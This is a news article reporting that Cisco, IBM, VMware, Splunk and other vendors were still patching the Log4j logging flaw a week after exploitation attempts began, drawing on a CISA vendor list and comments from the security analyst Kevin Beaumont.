Several tech companies still working to fix flaw in logging software

Several tech companies still working to fix flaw in logging software

SAN FRANCISCO Reuters -- Some of the world's largest technology companies are still trying to make their products safe from a gaping vulnerability in common logging software a week after hackers tried to exploit it.

According to a report released by the U.S. Cybersecurity and Infrastructure Security Agency, Cisco Systems, IBM, VMware and Splunk were among the companies with multiple pieces of flawed software that customers were using on Thursday without available patches for the Log 4 j vulnerability.

Logging software is a piece of software that tracks activity such as site visits, clicks and chats.

The company efforts underscore the wide reach of the flaw found inside open-source software, described by officials and researchers as the worst flaw they have seen in years.

A researcher for Chinese tech company Alibaba warned the nonprofit Apache Software Foundation early this month that Log 4 j would not only keep track of chats or clicks, but would also follow links to outside sites, which could allow a hacker to take control of the server.

Apache has rushed out a fix for the program. The free logger is used by thousands of other programs, and those responsible for them must prepare and distribute their own patches to prevent takeovers. Some of the programs that have engineers working around the clock include free software maintained by volunteers, as well as programs from companies big and small.

Security threat analyst Kevin Beaumont, who is helping compile the list for CISA, said that a lot of vendors are without security patches for this vulnerability. Software vendors need to have better, public inventories around open-source software usage to be able to assess risk, both for themselves and their customers. A number of companies, including Cisco, are updating guidance daily with updates on vulnerabilities, available patches or strategies for mitigating or detecting intrusions when they occur.

As of Thursday, the CISA list included about 20 Cisco products that were vulnerable to attack without a patch available, including Cisco WebEx Meetings Server and Cisco Umbrella, a cloud security product.

Many more were listed as being investigated to see if they were vulnerable as well.

A company spokesman said that over 200 products and approximately 130 are not vulnerable. Many affected products have dates available for software patches. VMware is updating its advisory on its site with dozens of impacted products, many with critical vulnerabilities and patch pending. Some of those without a patch have workarounds to mitigate the holes.

Splunk has a similar list, along with tips for hunting for hackers who are trying to abuse the flaw.

IBM did not confirm or disclose vulnerabilities externally, even to individual customers until a fix or remediation is available, and listed nonvulnerable products. CISA officials said Wednesday they had not confirmed any successful government-backed attacks or intrusions inside U.S. government equipment, even though Microsoft, Mandiant and CrowdStrike have all said they see nation-state attackers from better-equipped U.S. adversaries probing for the Log 4 j flaw.